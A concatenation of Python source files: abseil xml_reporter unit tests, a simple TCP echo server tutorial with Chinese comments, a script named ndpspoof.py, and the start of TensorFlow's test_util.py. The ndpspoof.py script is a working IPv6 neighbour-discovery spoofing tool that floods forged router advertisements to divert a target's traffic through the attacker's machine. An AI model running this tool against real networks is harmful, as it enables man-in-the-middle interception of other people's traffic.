result.addError(test, self.get_terminal_escape_sample_failure())
result.stopTest(test)
result.printErrors()
self._assert_valid_xml(self.xml_stream.getvalue())
def test_with_expected_failure_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
error_values = ''
try:
raise RuntimeError('Test expectedFailure')
except RuntimeError:
error_values = sys.exc_info()
test = MockTest('__main__.MockTest.expected_failing_test')
result.startTest(test)
result.addExpectedFailure(test, error_values)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': 'expected_failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(re.compile(expected_re, re.DOTALL),
self.xml_stream.getvalue())
def test_with_unexpected_success_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.unexpectedly_passing_test')
result.startTest(test)
result.addUnexpectedSuccess(test)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'test_name': 'unexpectedly_passing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': UNEXPECTED_SUCCESS_MESSAGE}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_skipped_test(self):
start_time = 100
end_time = 100
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.skipped_test_with_reason')
result.startTest(test)
result.addSkip(test, 'b"r')
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': 'skipped_test_with_reason',
'classname': '__main__.MockTest',
'status': 'notrun',
'result': 'suppressed',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_suite_time(self):
start_time1 = 100
end_time1 = 200
start_time2 = 400
end_time2 = 700
name = '__main__.MockTest.failing_test'
result = self._make_result((start_time1, end_time1, start_time2, end_time2))
test = MockTest('%s1' % name)
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
test = MockTest('%s2' % name)
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.printErrors()
run_time1 = end_time1 - start_time1
run_time2 = end_time2 - start_time2
expected_prefix = """<?xml version="1.0"?>
<testsuites name="" tests="2" failures="0" errors="0" time="%.1f">
<testsuite name="MockTest" tests="2" failures="0" errors="0" time="%.1f">
""" % (run_time1 + run_time2, run_time1 + run_time2)
self.failUnless(self.xml_stream.getvalue().startswith(expected_prefix))
def test_with_no_suite_name(self):
start_time = 1000
end_time = 1200
result = self._make_result((start_time, end_time))
test = MockTest('__main__.MockTest.bad_name')
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': 'bad_name',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_unnamed_parameterized_testcase(self):
"""Test unnamed parameterized test cases.
Unnamed parameterized test cases might have non-alphanumeric characters in
their test method names. This test ensures xml_reporter handles them
correctly.
"""
class ParameterizedTest(parameterized.TestCase):
@parameterized.parameters(('a (b.c)',))
def test_prefix(self, case):
self.assertTrue(case.startswith('a'))
start_time = 1000
end_time = 1200
result = self._make_result((start_time, end_time))
test = ParameterizedTest(methodName='test_prefix0')
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.printErrors()
run_time = end_time - start_time
classname = xml_reporter._escape_xml_attr(
unittest.util.strclass(test.__class__))
expected_re = OUTPUT_STRING % {
'suite_name': 'ParameterizedTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'test_name': re.escape('test_prefix('a (b.c)')'),
'classname': classname,
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''}
self._assert_match(expected_re, self.xml_stream.getvalue())
def teststop_test_without_pending_test(self):
end_time = 1200
result = self._make_result((end_time,))
test = MockTest('__main__.MockTest.bad_name')
result.stopTest(test)
# Just verify that this doesn't crash
def test_text_and_xmltest_runner(self):
runner = xml_reporter.TextAndXMLTestRunner(self.xml_stream, self.stream,
'foo', 1)
result1 = runner._makeResult()
result2 = xml_reporter._TextAndXMLTestResult(None, None, None, 0, None)
self.failUnless(type(result1) is type(result2))
def test_timing_with_time_stub(self):
"""Make sure that timing is correct even if time.time is stubbed out."""
try:
saved_time = time.time
time.time = lambda: -1
reporter = xml_reporter._TextAndXMLTestResult(self.xml_stream,
self.stream,
'foo', 0)
test = MockTest('bar')
reporter.startTest(test)
self.failIf(reporter.start_time == -1)
finally:
time.time = saved_time
def test_concurrent_add_and_delete_pending_test_case_result(self):
"""Make sure adding/deleting pending test case results are thread safe."""
result = xml_reporter._TextAndXMLTestResult(None, self.stream, None, 0,
None)
def add_and_delete_pending_test_case_result(test_name):
test = MockTest(test_name)
result.addSuccess(test)
result.delete_pending_test_case_result(test)
for i in range(50):
add_and_delete_pending_test_case_result('add_and_delete_test%s' % i)
self.assertEqual(result.pending_test_case_results, {})
def test_concurrent_test_runs(self):
"""Make sure concurrent test runs do not race each other."""
num_passing_tests = 20
num_failing_tests = 20
num_error_tests = 20
total_num_tests = num_passing_tests + num_failing_tests + num_error_tests
times = [i for i in range(2*total_num_tests)]
result = self._make_result(times)
threads = []
names = []
for i in range(num_passing_tests):
name = 'passing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
# xml_reporter uses id(test) as the test identifier.
# In a real testing scenario, all the test instances are created before
# running them. So all ids will be unique.
# We must do the same here: create test instance beforehand.
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_passing_test, args=(test, result)))
for i in range(num_failing_tests):
name = 'failing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_failing_test, args=(test, result)))
for i in range(num_error_tests):
name = 'error_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_error_test, args=(test, result)))
for t in threads:
t.start()
for t in threads:
t.join()
result.printErrors()
tests_not_in_xml = []
for tn in names:
if tn not in self.xml_stream.getvalue():
tests_not_in_xml.append(tn)
msg = ('Expected xml_stream to contain all test %s results, but %s tests '
'are missing. List of missing tests: %s' % (
total_num_tests, len(tests_not_in_xml), tests_not_in_xml))
self.assertEqual([], tests_not_in_xml, msg)
def test_add_failure_during_stop_test(self):
"""Tests an addFailure() call from within a stopTest() call stack."""
result = self._make_result((0, 2))
test = MockTest('__main__.MockTest.failing_test')
result.startTest(test)
# Replace parent stopTest method from unittest3_backport.TextTestResult with
# a version that calls self.addFailure().
with mock.patch.object(
unittest3_backport.TextTestResult,
'stopTest',
side_effect=lambda t: result.addFailure(t, self.get_sample_failure())):
# Run stopTest in a separate thread since we are looking to verify that
# it does not deadlock, and would otherwise prevent the test from
# completing.
stop_test_thread = threading.Thread(target=result.stopTest, args=(test,))
stop_test_thread.daemon = True
stop_test_thread.start()
stop_test_thread.join(10.0)
self.assertFalse(stop_test_thread.is_alive(),
'result.stopTest(test) call failed to complete')
class XMLTest(absltest.TestCase):
def test_escape_xml(self):
self.assertEqual(xml_reporter._escape_xml_attr('"Hi" <\'>\t\r\n'),
'"Hi" <'>	
')
class XmlReporterFixtureTest(absltest.TestCase):
def _run_test_and_get_xml(self, flag):
"""Runs xml_reporter_helper_test and returns an Element instance.
Runs xml_reporter_helper_test in a new process so that it can
exercise the entire test infrastructure, and easily test issues in
the test fixture.
Args:
flag: flag to pass to xml_reporter_helper_test
Returns:
The Element instance of the XML output.
"""
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary_name = 'absl/testing/tests/xml_reporter_helper_test'
args = [_bazelize_command.get_executable_path(binary_name),
flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
finally:
os.remove(xml_fname)
return xml
def _run_test(self, flag, num_errors, num_failures, suites):
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary_name = 'absl/testing/tests/xml_reporter_helper_test'
args = [_bazelize_command.get_executable_path(binary_name),
flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
logging.info('xml output is:\n%s', ElementTree.tostring(xml))
finally:
os.remove(xml_fname)
self.assertEqual(int(xml.attrib['errors']), num_errors)
self.assertEqual(int(xml.attrib['failures']), num_failures)
self.assertLen(xml, len(suites))
actual_suites = sorted(
xml.findall('testsuite'), key=lambda x: x.attrib['name'])
suites = sorted(suites, key=lambda x: x['name'])
for actual_suite, expected_suite in zip(actual_suites, suites):
self.assertEqual(actual_suite.attrib['name'], expected_suite['name'])
self.assertLen(actual_suite, len(expected_suite['cases']))
actual_cases = sorted(actual_suite.findall('testcase'),
key=lambda x: x.attrib['name'])
expected_cases = sorted(expected_suite['cases'], key=lambda x: x['name'])
for actual_case, expected_case in zip(actual_cases, expected_cases):
self.assertEqual(actual_case.attrib['name'], expected_case['name'])
self.assertEqual(actual_case.attrib['classname'],
expected_case['classname'])
if 'error' in expected_case:
actual_error = actual_case.find('error')
self.assertEqual(actual_error.attrib['message'],
expected_case['error'])
if 'failure' in expected_case:
actual_failure = actual_case.find('failure')
self.assertEqual(actual_failure.attrib['message'],
expected_case['failure'])
return xml
def _test_for_error(self, flag, message):
"""Run the test and look for an Error with the specified message."""
ret, xml = self._run_test_with_subprocess(flag)
self.assertNotEqual(ret, 0)
self.assertEqual(int(xml.attrib['errors']), 1)
self.assertEqual(int(xml.attrib['failures']), 0)
for msg in xml.iter('error'):
if msg.attrib['message'] == message:
break
else:
self.fail(msg='Did not find message: "%s" in xml\n%s' % (
message, ElementTree.tostring(xml)))
def _test_for_failure(self, flag, message):
"""Run the test and look for a Failure with the specified message."""
ret, xml = self._run_test_with_subprocess(flag)
self.assertNotEqual(ret, 0)
self.assertEqual(int(xml.attrib['errors']), 0)
self.assertEqual(int(xml.attrib['failures']), 1)
for msg in xml.iter('failure'):
if msg.attrib['message'] == message:
break
else:
self.fail(msg='Did not find message: "%s"' % message)
def test_set_up_module_error(self):
self._run_test(
flag='--set_up_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': '__main__',
'cases': [{'name': 'setUpModule',
'classname': '__main__',
'error': 'setUpModule Errored!'}]}])
def test_tear_down_module_error(self):
self._run_test(
flag='--tear_down_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'}]},
{'name': '__main__',
'cases': [{'name': 'tearDownModule',
'classname': '__main__',
'error': 'tearDownModule Errored!'}]}])
def test_set_up_class_error(self):
self._run_test(
flag='--set_up_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'setUpClass',
'classname': '__main__.FailableTest',
'error': 'setUpClass Errored!'}]}])
def test_tear_down_class_error(self):
self._run_test(
flag='--tear_down_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'},
{'name': 'tearDownClass',
'classname': '__main__.FailableTest',
'error': 'tearDownClass Errored!'}]}])
def test_set_up_error(self):
self._run_test(
flag='--set_up_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Errored!'}]}])
def test_tear_down_error(self):
self._run_test(
flag='--tear_down_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Errored!'}]}])
def test_test_error(self):
self._run_test(
flag='--test_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'test Errored!'}]}])
def test_set_up_failure(self):
if six.PY2:
# A failure in setUp() produces an error (not a failure), which is
# inconsistent with the Python unittest documentation. In Python
# 2.7, the bug appears to be in unittest.TestCase.run() method.
# Although it correctly checks for a SkipTest exception, it does
# not check for a failureException.
self._run_test(
flag='--set_up_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Failed!'}]}])
else:
self._run_test(
flag='--set_up_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'setUp Failed!'}]}])
def test_tear_down_failure(self):
if six.PY2:
# See comment in test_set_up_failure().
self._run_test(
flag='--tear_down_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Failed!'}]}])
else:
self._run_test(
flag='--tear_down_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'tearDown Failed!'}]}])
def test_test_fail(self):
self._run_test(
flag='--test_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'test Failed!'}]}])
if __name__ == '__main__':
absltest.main()
|
038_server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
网络编程 - TCP 请求 - 服务端
功能:接受客户端请求带过来的字符串,加上 hello 后返回给客户端
'''
import socket, threading, time
# 创建 socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 监听客户端 ip 和端口:
s.bind(('127.0.0.1', 9999))
s.listen(5)
print('Waiting for connection...')
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
sock.send(b'Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if not data or data.decode('utf-8') == 'exit':
break
sock.send(('Hello, %s!' % data.decode('utf-8')).encode('utf-8'))
sock.close()
print('Connection from %s:%s closed.' % addr)
while True:
# 接受一个新连接:
sock, addr = s.accept()
# 创建新线程来处理TCP连接:
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
|
ndpspoof.py
|
from threading import Thread
from scapy.all import *
import netifaces as ni
stop = 1
def NDP_poison(target_ipv6, gateway_ipv6, target_mac, gateway_mac, host_mac):
print("[*] NDP poisoning...")
try:
global stop
while stop:
ether = (Ether(dst='33:33:00:00:00:01', src=host_mac))
ipv6 = IPv6(src=gateway_ipv6, dst='ff02::1')
ra = ICMPv6ND_RA()
lla = ICMPv6NDOptSrcLLAddr(lladdr=host_mac)
sendp(ether/ipv6/ra/lla, iface='wlp3s0', verbose=0)
except Exception as e:
print("[!!] Error while ndp spoofing: " + str(e))
finally:
clean_up(target_ipv6, gateway_ipv6, target_mac, gateway_mac)
print("[*] NDP poisoning has ended")
def clean_up(target_ip, gateway_ipv6, target_mac, gateway_mac):
print("[*] Cleaning ndp cache...")
try:
ether = (Ether(dst='33:33:00:00:00:01', src=gateway_mac))
ipv6 = IPv6(src=gateway_ipv6, dst='ff02::1')
ra = ICMPv6ND_RA()
lla = ICMPv6NDOptSrcLLAddr(lladdr=gateway_mac)
sendp(ether / ipv6 / ra / lla, iface='wlp3s0', verbose=0)
except Exception as e:
print("[!!] Error while cleaning up ndp: " + str(e))
def ndpspoof(target_ipv6, interface):
try:
if interface not in ni.interfaces():
print("No such network interface: " + interface)
exit(-1)
host_ipv6 = ni.ifaddresses(interface)[10][-1]['addr'].replace('%'+interface, '')
host_mac = ni.ifaddresses(interface)[ni.AF_LINK][0]['addr']
gws = ni.gateways()
gateway_ipv6 = gws['default'][ni.AF_INET6][0]
print("[*] Getting MAC address of default gateway...")
pkt = sr1(IPv6(dst=gateway_ipv6)/ICMPv6ND_NS(tgt=gateway_ipv6), iface='wlp3s0', verbose=0)
gateway_mac = pkt[ICMPv6NDOptDstLLAddr].lladdr
if gateway_mac is None:
print("[*] Could not get MAC address of default gateway")
exit(-1)
print("[*] Getting MAC address of target...")
pkt = sr1(IPv6(dst=target_ipv6) / ICMPv6ND_NS(tgt=target_ipv6), iface='wlp3s0', verbose=0)
target_mac = pkt[ICMPv6NDOptDstLLAddr].lladdr
if target_mac is None:
print("[*] Could not get MAC address of target")
exit(-1)
print("\tHost IP: ", host_ipv6)
print("\tHost MAC: ", host_mac)
print("\tDefault gateway IP: ", gateway_ipv6)
print("\tDefault gateway MAC: ", gateway_mac)
print("\tTarget IP: ", target_ipv6)
print("\tTarget MAC: ", target_mac)
ndp_poison = Thread(target=NDP_poison, args=(target_ipv6, gateway_ipv6, target_mac, gateway_mac, host_mac))
ndp_poison.start()
except Exception as e:
print("[!!] Error while initializing ndpspoof: " + str(e))
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the above import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
